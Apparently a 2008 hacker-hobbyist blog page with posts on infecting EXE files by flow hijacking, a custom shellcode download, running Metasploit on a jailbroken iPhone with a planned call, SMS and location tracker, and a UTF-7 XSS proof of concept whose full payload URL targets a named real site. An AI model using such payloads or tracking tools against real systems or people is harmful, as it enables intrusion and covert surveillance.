Sunday, July 20, 2008
Flow hiJACKing
Application flow hijacking is one of the popular methods to infect EXE files, by the use of this method one can inject malicious \xHEXa code into application code section and then ask the instruction pointer to execute it as a part of the original code. Read More here... hiJACKing
Saturday, July 12, 2008
Tools In The Box
New / 0ld applications in the tools section......
Super ShellCode - Superman shell code sound track. Isntead of running calc as a shell code I decided to code my own super rintchi shell code. open the file with olly and copy/use the relevant code as a shell code.
ShareWatcher - A small .NET application that will watch NetBios connection to your PC. It will alert and log all connections.
TrafficViewer - Israeli road cameras (watch 8 cams in one window).
PS Whats that? data = google.doGoogleSearch(query,maxResults=20)
Enjoy.
Super ShellCode - Superman shell code sound track. Isntead of running calc as a shell code I decided to code my own super rintchi shell code. open the file with olly and copy/use the relevant code as a shell code.
ShareWatcher - A small .NET application that will watch NetBios connection to your PC. It will alert and log all connections.
TrafficViewer - Israeli road cameras (watch 8 cams in one window).
PS Whats that? data = google.doGoogleSearch(query,maxResults=20)
Enjoy.
Tuesday, July 8, 2008
XSS UTF-7
Lament (my best student so far....) discovered a new XSS vulnerability in Apache server (two months ago and still unfixed). read about Cross-site Scripting here.
This vulnerability can show us that we can`t blindly TRUST links from known domain names. In the following POC we can see that walla.co.il is vulnerable just like all the other websites that running Apache server.
POC
Open new Explorer and paste the following link:
http://www.walla.co.il/Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj2sqz
bX0Kc3Fu7vfthepWhmKvjudPuJTNeK9zw5MaZ1yXJi8RJRRuPe5UahFwOblM
XsIPTGh3pVjTLdim3vuTKgdazOG9idQbIjbnpMEco8Zlo5xNRuCoviPx7x7tYYe
Ogc8HU46gaecJwnHY7f6GlQB8H6kBFhjoIaHE1SQPhU5VReCz1olPh5jZ%3Cfont
%20size=50%3EDEFACED%3C!xc+ADw-script+AD4-alert('I XSSedYOU!!!')+ADw-/script+AD4---//--
Next, right click on the page and change encoding to auto select. BOOM. A message box should be opened now.
Conclusion, if you recieve a long encrypted link just dont open it. BE AWARE.
This vulnerability can show us that we can`t blindly TRUST links from known domain names. In the following POC we can see that walla.co.il is vulnerable just like all the other websites that running Apache server.
POC
Open new Explorer and paste the following link:
http://www.walla.co.il/Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj2sqz
bX0Kc3Fu7vfthepWhmKvjudPuJTNeK9zw5MaZ1yXJi8RJRRuPe5UahFwOblM
XsIPTGh3pVjTLdim3vuTKgdazOG9idQbIjbnpMEco8Zlo5xNRuCoviPx7x7tYYe
Ogc8HU46gaecJwnHY7f6GlQB8H6kBFhjoIaHE1SQPhU5VReCz1olPh5jZ%3Cfont
%20size=50%3EDEFACED%3C!xc+ADw-script+AD4-alert('I XSSedYOU!!!')+ADw-/script+AD4---//--
Next, right click on the page and change encoding to auto select. BOOM. A message box should be opened now.
Conclusion, if you recieve a long encrypted link just dont open it. BE AWARE.
Friday, July 4, 2008
iJackPhone
In the last few days while been paralyzed and unable to move from bed I had time to do some cool stuff with my iPhone. It all started when my L33T H@X0R bro - Muts invited me to join him on a iPhone journey - install Metasploit framework on a new iPhone.
First, we needed to Unlock, jailbreak and install Cydia on the iPhone. Good old Ziphone helped us to open the iPhone for third party applications and then we installed Cydia with the installer.application. Cydia is a distribution of GNU and BSD`s userspace for the iPhone. In other words, if you want to use bash, chmod, nc, passwd, su, tcpdump commands then you need Cydia.
Once all packges have been installed apt-get install wget,ruby,ruby-gems we downloaded the Metasploit framework to the iPhone, tar it and execute it. Fast and Simple!!!
Now, I`m working on a tool that will track Calls,SMS,History and Location of the iPhone. Hopefully it will be ready before BlackHat 2008.
A sample script that logs cordination from wifi,cellular every $Time can be found here. (still on progress)
REQUIREMENTS
This script is based on findLocation and findme-muchbetter scripts.
iPhone Remote Shell
iPhone Terminal
PS - Rintchi /me L0V3S Y0U
ג'קי אלטל
Subscribe to:
Posts (Atom)